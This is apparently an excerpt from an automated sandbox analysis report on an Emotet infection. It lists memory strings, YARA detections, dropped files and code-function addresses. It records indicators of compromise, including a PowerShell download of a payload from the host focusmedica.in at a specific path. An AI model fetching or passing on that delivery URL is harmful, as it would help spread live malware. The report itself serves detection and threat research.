                  Source: svchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                  Source: svchost.exe, 0000000B.00000002.327125086.0000018977C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                  Source: svchost.exe, 0000000B.00000003.322803450.0000018977C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327962239.0000018977C5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                  Source: svchost.exe, 0000000B.00000003.322760702.0000018977C67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.328487102.0000018977C6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                  Source: svchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                  Source: svchost.exe, 0000000B.00000003.322803450.0000018977C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327962239.0000018977C5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                  Source: svchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                  Source: svchost.exe, 0000000B.00000002.327125086.0000018977C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                  Source: svchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                  Source: svchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                  Source: svchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                  Source: svchost.exe, 0000000B.00000003.301111705.0000018977C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                  Source: svchost.exe, 0000000B.00000003.322961675.0000018977C40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327141707.0000018977C42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.323195530.0000018977C41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                  Source: svchost.exe, 0000000B.00000003.322961675.0000018977C40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327141707.0000018977C42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.323195530.0000018977C41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                  Source: svchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                  Source: svchost.exe, 0000000B.00000003.322803450.0000018977C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.322961675.0000018977C40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327962239.0000018977C5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                  Source: svchost.exe, 00000014.00000003.423552055.00000278A4587000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.422216297.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.423694204.00000278A4588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                  Source: svchost.exe, 0000000B.00000003.322793678.0000018977C5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                  Source: svchost.exe, 0000000B.00000003.322803450.0000018977C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327962239.0000018977C5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                  Source: svchost.exe, 0000000B.00000002.327962239.0000018977C5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                  Source: svchost.exe, 0000000B.00000003.323180966.0000018977C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                  Source: svchost.exe, 0000000B.00000003.322785600.0000018977C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                  Source: svchost.exe, 0000000B.00000003.301111705.0000018977C31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327125086.0000018977C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                  Source: svchost.exe, 0000000B.00000003.301111705.0000018977C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                  Source: powershell.exe, 00000002.00000002.296563737.000002A116E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000002.00000002.301712766.000002A117962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000000.00000002.314787403.000002C330D50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.302946460.000002A126C84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: svchost.exe, 00000014.00000003.415993426.00000278A45AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.415934136.00000278A4A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.417296426.00000278A4588000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.415967701.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.416039104.00000278A4A02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                  Source: svchost.exe, 0000000B.00000002.327125086.0000018977C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                  Source: svchost.exe, 0000000B.00000002.325666258.0000018977C13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327125086.0000018977C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                  Source: svchost.exe, 0000000B.00000003.322961675.0000018977C40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.323180966.0000018977C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                  Source: svchost.exe, 0000000B.00000003.322961675.0000018977C40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.323180966.0000018977C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                  Source: svchost.exe, 0000000B.00000003.301111705.0000018977C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                  Source: svchost.exe, 0000000B.00000003.301111705.0000018977C31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.326048817.0000018977C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                  Source: svchost.exe, 0000000B.00000003.322961675.0000018977C40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.323148198.0000018977C47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327924238.0000018977C4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                  Source: svchost.exe, 00000014.00000003.423552055.00000278A4587000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.422216297.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.423694204.00000278A4588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                  Source: svchost.exe, 00000014.00000003.423552055.00000278A4587000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.422216297.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.423694204.00000278A4588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                  Source: svchost.exe, 00000014.00000003.415993426.00000278A45AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.415934136.00000278A4A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.417296426.00000278A4588000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.415967701.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.416039104.00000278A4A02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                  Source: svchost.exe, 00000014.00000003.415993426.00000278A45AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.415934136.00000278A4A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.417296426.00000278A4588000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.415967701.00000278A4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.416039104.00000278A4A02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                  Source: svchost.exe, 00000014.00000003.426094048.00000278A459B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.426121984.00000278A4A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.427531416.00000278A4588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                  Source: unknownDNS traffic detected: queries for: focusmedica.in
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CE3438 InternetReadFile,8_2_02CE3438
                  Source: global trafficHTTP traffic detected: GET /fmlib/IxBABMh0I2cLM3qq1GVv/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: focusmedica.inConnection: Keep-Alive
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000F988 GetKeyState,GetKeyState,GetKeyState,SendMessageA,6_2_000000018000F988

                  E-Banking Fraud

                  barindex
                  Yara detected Emotet
                  Source: Yara matchFile source: 8.2.regsvr32.exe.2c90000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.regsvr32.exe.2c90000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.regsvr32.exe.1380000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.regsvr32.exe.1380000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.518723563.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.296695809.00000000013B1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.296664424.0000000001380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.518667146.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: Process Memory Space: powershell.exe PID: 6424, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Powershell drops PE file
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\GMOWDTRfIJ.xtqJump to dropped file
                  Source: Process Memory Space: powershell.exe PID: 6424, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
                  Source: Process Memory Space: powershell.exe PID: 6424, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 6624, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
                  Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\Atpvfjzdexae\Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFC0111056F0_2_00007FFC0111056F
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC011107CD2_2_00007FFC011107CD
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800038E06_2_00000001800038E0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002D9346_2_000000018002D934
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180025A206_2_0000000180025A20
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002C2406_2_000000018002C240
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180029A446_2_0000000180029A44
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800292706_2_0000000180029270
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180027A8C6_2_0000000180027A8C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180011AFC6_2_0000000180011AFC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180021B106_2_0000000180021B10
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002CB3C6_2_000000018002CB3C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000EDF06_2_000000018000EDF0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800286146_2_0000000180028614
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002264C6_2_000000018002264C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800277286_2_0000000180027728
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_011F00006_2_011F0000
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013BC1086_2_013BC108
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B21006_2_013B2100
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013D39AC6_2_013D39AC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B4DFC6_2_013B4DFC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013C2C786_2_013C2C78
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013CA46C6_2_013CA46C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013CD8E86_2_013CD8E8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013BB7286_2_013BB728
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B47886_2_013B4788
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B3A186_2_013B3A18
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013D55346_2_013D5534
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013CBD1C6_2_013CBD1C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013D45086_2_013D4508
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013CAD546_2_013CAD54
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B6D506_2_013B6D50
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013C95446_2_013C9544
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B59B06_2_013B59B0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B8DB46_2_013B8DB4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013BD9A86_2_013BD9A8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013CA1A06_2_013CA1A0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013C49A06_2_013C49A0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013BDD806_2_013BDD80
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013C0DE86_2_013C0DE8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013BB1E06_2_013BB1E0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013CFDDC6_2_013CFDDC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B89D86_2_013B89D8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B75DC6_2_013B75DC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013C34386_2_013C3438
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013D50286_2_013D5028
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B18206_2_013B1820
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013C9C106_2_013C9C10
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013C44106_2_013C4410
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013BA0146_2_013BA014
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013CC8606_2_013CC860
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013D14606_2_013D1460
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013D005C6_2_013D005C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013CCC486_2_013CCC48
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013CF4B46_2_013CF4B4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013BF0B06_2_013BF0B0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013CC0B06_2_013CC0B0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013CD4B06_2_013CD4B0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013C04AC6_2_013C04AC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013C8CAC6_2_013C8CAC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013C64AC6_2_013C64AC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B84A06_2_013B84A0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B28F86_2_013B28F8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013C6CF86_2_013C6CF8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013C00F06_2_013C00F0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B7CEC6_2_013B7CEC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B94D46_2_013B94D4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013C5B346_2_013C5B34
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B8B346_2_013B8B34
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013CAF246_2_013CAF24
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B770C6_2_013B770C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013D3F786_2_013D3F78
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013BAF706_2_013BAF70
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B5F686_2_013B5F68
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013CDB5C6_2_013CDB5C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B934C6_2_013B934C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B4F4C6_2_013B4F4C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013BFBAC6_2_013BFBAC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013BCBA46_2_013BCBA4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013D038C6_2_013D038C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B1FE06_2_013B1FE0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013CCFD86_2_013CCFD8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013BF7DC6_2_013BF7DC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B1BD46_2_013B1BD4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013C5FC86_2_013C5FC8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013D16086_2_013D1608
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B660C6_2_013B660C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B42786_2_013B4278
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013C6A786_2_013C6A78
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B7E7C6_2_013B7E7C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B9A706_2_013B9A70
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013C7A706_2_013C7A70
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013BAE6C6_2_013BAE6C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013C86606_2_013C8660
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013C06606_2_013C0660
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013C82586_2_013C8258
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B4A5C6_2_013B4A5C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B365C6_2_013B365C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013BE6506_2_013BE650
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013C3A4C6_2_013C3A4C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B62446_2_013B6244
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013C8AA46_2_013C8AA4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013CC2FC6_2_013CC2FC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013D4AFC6_2_013D4AFC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013B26FC6_2_013B26FC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013D2AE46_2_013D2AE4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013C62CC6_2_013C62CC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_013BAAC86_2_013BAAC8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02C800008_2_02C80000
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CED8E88_2_02CED8E8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CF2AE48_2_02CF2AE4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CE6CF88_2_02CE6CF8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CE8CAC8_2_02CE8CAC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CEA46C8_2_02CEA46C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CEC8608_2_02CEC860
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD3A188_2_02CD3A18
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CDA0148_2_02CDA014
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CE44108_2_02CE4410
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CE34388_2_02CE3438
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD4DFC8_2_02CD4DFC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CF038C8_2_02CF038C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CF19A08_2_02CF19A0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CDC1088_2_02CDC108
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CF45088_2_02CF4508
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD21008_2_02CD2100
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CE62CC8_2_02CE62CC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CDAAC88_2_02CDAAC8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD94D48_2_02CD94D4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD7CEC8_2_02CD7CEC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD26FC8_2_02CD26FC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CEC2FC8_2_02CEC2FC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CF4AFC8_2_02CF4AFC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD28F88_2_02CD28F8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CE00F08_2_02CE00F0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CE64AC8_2_02CE64AC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CE04AC8_2_02CE04AC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CE8AA48_2_02CE8AA4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD84A08_2_02CD84A0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CEF4B48_2_02CEF4B4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CDF0B08_2_02CDF0B0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CEC0B08_2_02CEC0B0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CED4B08_2_02CED4B0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CE3A4C8_2_02CE3A4C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CECC488_2_02CECC48
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD62448_2_02CD6244
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD4A5C8_2_02CD4A5C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD365C8_2_02CD365C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CF005C8_2_02CF005C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CE82588_2_02CE8258
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CDE6508_2_02CDE650
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CDAE6C8_2_02CDAE6C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CE86608_2_02CE8660
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CE06608_2_02CE0660
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CF14608_2_02CF1460
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD7E7C8_2_02CD7E7C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD42788_2_02CD4278
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CE2C788_2_02CE2C78
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CE6A788_2_02CE6A78
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD9A708_2_02CD9A70
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CE7A708_2_02CE7A70
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD660C8_2_02CD660C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CF16088_2_02CF1608
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CE9C108_2_02CE9C10
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CF50288_2_02CF5028
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD18208_2_02CD1820
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CE5FC88_2_02CE5FC8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CDF7DC8_2_02CDF7DC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CD75DC8_2_02CD75DC
